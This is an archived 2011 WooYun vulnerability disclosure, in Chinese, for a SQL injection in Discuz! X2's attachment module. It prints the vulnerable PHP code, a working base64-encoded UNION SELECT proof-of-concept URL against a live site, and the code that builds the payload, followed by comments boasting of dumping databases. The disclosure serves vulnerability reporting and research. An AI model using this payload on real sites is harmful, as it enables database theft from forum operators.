当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02330

漏洞标题:Discuz! X2 SQL注射漏洞

相关厂商:Discuz!

漏洞作者: Jannock

提交时间:2011-06-28 16:49

修复时间:2011-07-28 18:00

公开时间:2011-07-28 18:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-06-28: 细节已通知厂商并且等待厂商处理中
2011-06-28: 厂商已经确认,细节仅向厂商公开
2011-07-01: 细节向第三方安全合作伙伴开放
2011-08-22: 细节向核心白帽子及相关领域专家公开
2011-09-01: 细节向普通白帽子公开
2011-09-11: 细节向实习白帽子公开
2011-07-28: 细节向公众公开

简要描述:

Discuz! X2 SQL注射漏洞,支持Union

详细说明:

文件:source\module\forum\forum_attachment.php
if(!defined('IN_DISCUZ')) {
exit('Access Denied');
}
define('NOROBOT', TRUE);
@list($_G['gp_aid'], $_G['gp_k'], $_G['gp_t'], $_G['gp_uid'], $_G['gp_tableid']) = explode('|', base64_decode($_G['gp_aid']));
if(!empty($_G['gp_findpost']) && ($attach = DB::fetch_first("SELECT pid, tid FROM ".DB::table('forum_attachment')." WHERE aid='$_G[gp_aid]'"))) {
dheader('location: forum.php?mod=redirect&goto=findpost&pid='.$attach['pid'].'&ptid='.$attach['tid']);
}
变量aid 直接base64_decode 后传入 SQL查询,造成注射漏洞。。。

漏洞证明:

http://www.discuz.net/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsVEFCTEVfTkFNRSBmcm9tIElORk9STUFUSU9OX1NDSEVNQS5UQUJMRVMgd2hlcmUgVEFCTEVfU0NIRU1BPWRhdGFiYXNlKCkgYW5kICBUQUJMRV9OQU1FIGxpa2UgJyVfbWVtYmVyfHh8eHx4fHg%3D
http://www.discuz.net/forum.php?mod=redirect&goto=findpost&pid=1&ptid=pre_common_admincp_member
暴出表名 pre_common_admincp_member
实际查询为:
$x="1' and 1=2 union all select 1,TABLE_NAME from INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA=database() and TABLE_NAME like '%_member|x|x|x|x";
die (urlencode(base64_encode($x)));

修复方案:

您懂得!

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2011-06-28 18:44

厂商回复:

感谢您的支持, 我们已经处理中

最新状态:

暂无


漏洞评价:

评论

  1. 2011-06-28 17:12 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    果断是乌云排名第一

  2. 2011-06-28 17:20 | 狗样的男人 ( 实习白帽子 | Rank:42 漏洞数:11 )

    求真相啊,这可是- -

  3. 2011-06-28 17:26 | Lmy ( 实习白帽子 | Rank:69 漏洞数:12 | 低调求发展)

    同求真相,传说中的DZ X2! 最近传得沸沸扬扬的,不知道是否属实!

  4. 2011-06-28 17:36 | 阿神 ( 实习白帽子 | Rank:33 漏洞数:4 | 值得。)

    不知道是不是和黑吧的那个一样额,,,NT...

  5. 2011-06-28 17:39 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    我觉得吧 相信Jannock神

  6. 2011-06-28 19:27 | yingzi ( 实习白帽子 | Rank:38 漏洞数:3 )

    关注!!

  7. 2011-06-28 21:09 | null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)

    V5.....

  8. 2011-06-28 21:35 | GaRY ( 实习白帽子 | Rank:39 漏洞数:3 | 真悲剧平男君)

    膜拜一下

  9. 2011-06-28 21:58 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

    = =! 拖库拖到手抽筋~

  10. 2011-06-28 21:59 | xy7 ( 路人 | 还没有发布任何漏洞 | javascript:alert(1))

    手抽筋啊手抽筋!

  11. 2011-06-28 22:05 | xy7 ( 路人 | 还没有发布任何漏洞 | javascript:alert(1))

    再次膜拜一下Jannock……

  12. 2011-06-29 05:13 | 顺子 ( 普通白帽子 | Rank:236 漏洞数:36 | 0-0努力像正常青年靠近,再也不当上错图的2...)

    我去啊。威武了

  13. 2011-06-29 09:02 | P w ( 实习白帽子 | Rank:72 漏洞数:14 | -这家伙很懒,什么都没有留下。其实我真的很...)

    手抽筋啊./

  14. 2011-06-29 11:02 | 薄雾ing ( 路人 | Rank:18 漏洞数:4 | 写点什么呢?还处于学习阶段。期待与更多业...)

    V5

  15. 2011-06-29 11:36 | rootsecurity ( 实习白帽子 | Rank:77 漏洞数:20 | 关注开源,关注网络安全!INSERT INTO `w...)

    有库脱了。

  16. 2011-06-29 15:13 | 酱油哥 ( 实习白帽子 | Rank:53 漏洞数:3 | 打酱油。)

    裤子要脱很长时间,脱到蛋疼。

  17. 2011-06-29 15:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    ToolS也有了 这样直接发布不太好

  18. 2011-06-29 15:43 | saga ( 路人 | Rank:11 漏洞数:2 | 世界上只有10种人,懂二进制的,和不懂二进...)

    据说不止这一个啊,继续关注!

  19. 2011-06-30 19:31 | Snow陈伦 ( 路人 | Rank:6 漏洞数:2 | 闷骚的家伙,何处都是你的战场。)

    路过。外传了就不好了

  20. 2012-11-04 19:28 | slls124 ( 路人 | Rank:5 漏洞数:1 | 新手)

    牛X

  21. 2014-07-25 14:09 | Vigoss_Z ( 普通白帽子 | Rank:404 漏洞数:63 | 楞娃)

    当年的0day,现在应该是10000的节奏